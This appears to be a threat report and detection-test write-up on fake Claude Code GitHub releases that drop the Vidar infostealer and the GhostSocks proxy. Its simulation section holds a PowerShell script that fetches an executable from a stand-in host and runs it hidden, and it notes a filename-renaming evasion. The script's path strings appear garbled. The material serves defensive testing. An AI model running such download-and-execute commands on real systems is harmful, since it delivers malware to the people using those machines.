Claude Code Lures Turn GitHub Releases into a Malware Delivery Channel

Summary

Threat actors rapidly capitalized on a misconfigured npm package that unintentionally exposed Anthropic’s Claude Code source. They spun up fake GitHub repositories hosting trojanized 7z “releases” that drop a Rust-built loader. Once executed, the dropper installs the Vidar infostealer alongside the GhostSocks SOCKS5 proxy to enable theft and covert access.

Investigation

The investigation uncovered a rotating-lure operation active since February 2026, relying on short-lived GitHub accounts to publish malicious release artifacts. Across the lure set, victims receive the same TradeAI.exe payload, which decrypts embedded C2 URLs, performs anti-analysis checks, and deploys both Vidar and GhostSocks. C2 discovery is handled through dead-drop resolvers hosted on Steam and Telegram, helping the campaign cycle infrastructure quickly.

Mitigation

Organizations should limit AI tool installs to vetted sources, block known malicious GitHub release links and related C2 domains, and watch closely for credential-theft behaviors. Add endpoint detections for Rust-compiled droppers and common Vidar/GhostSocks execution patterns. Strengthen coverage for sandbox-evasion signals and restrict suspicious script execution (including anomalous PowerShell activity) that may be used for staging or follow-on actions.

Response

If detected, isolate the endpoint, preserve the malicious executable and its associated 7z archive, and hunt for Vidar and GhostSocks artifacts across the host and network. Block the identified pastebin and snippet.host URLs and revoke any exposed credentials immediately. Perform a full credential-compromise assessment, then reset privileged accounts and invalidate tokens/sessions to prevent reuse.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

• Attack Narrative & Commands:
  An adversary receives a phishing email (T1566.002) containing a malicious link that points to a compromised GitHub repository hosting TradeAI.exe. The victim clicks the link, which launches PowerShell in a hidden window. The script downloads the dropper to the temporary directory, executes it, and the dropper subsequently installs the Vidar stealer and GhostSocks proxy (T1027, T1090.003).

• Regression Test Script:

    # -------------------------------------------------
    # Simulate execution of TradeAI.exe dropper
    # -------------------------------------------------
    $url = "http://malicious.example.com/TradeAI.exe"
    $outPath = "$env:TEMPTradeAI.exe"
  
    # Download the dropper (mimic real attacker behavior)
    Invoke-WebRequest -Uri $url -OutFile $outPath -UseBasicParsing
  
    # Execute the dropper silently
    Start-Process -FilePath $outPath -WindowStyle Hidden
  
    # OPTIONAL: wait a few seconds to allow any child processes to spawn
    Start-Sleep -Seconds 5
    # -------------------------------------------------

• Cleanup Commands:

    # Remove the downloaded dropper and any temporary artifacts
    $outPath = "$env:TEMPTradeAI.exe"
    if (Test-Path $outPath) { Remove-Item $outPath -Force }
  
    # (If the dropper created additional files, locate and delete them as needed)
    # Example: delete known payload directory
    $payloadDir = "$env:APPDATAVidar"
    if (Test-Path $payloadDir) { Remove-Item $payloadDir -Recurse -Force }

Validation & Expected Outcome

1. Expected SIEM Alert: After running the regression script, the SIEM should generate an alert where Image ends with TradeAI.exe (or ClaudeCode_x64.exe). The alert title will match the rule’s title field.
2. Evasion Test: Rename the downloaded binary to TradeAI_renamed.exe and re‑run the script. No alert should fire, confirming the rule’s reliance on static filenames.

Hardening Recommendations

1. Add Hash Indicators: Include SHA‑256 hashes of known malicious droppers in the rule (or a separate hash‑based rule).
2. Broaden Scope: Extend detection to monitor for executions of unknown binaries launched from atypical locations (e.g., %TEMP%, %APPDATA%).
3. Behavioral Correlation: Correlate the process creation with subsequent network connections to known GhostSocks C2 domains (T1090.003) and file writes of known Vidar components.
4. Endpoint Enforcement: Deploy AppLocker or Windows Defender Application Control to block execution of unsigned binaries from user‑writable directories.

End of Report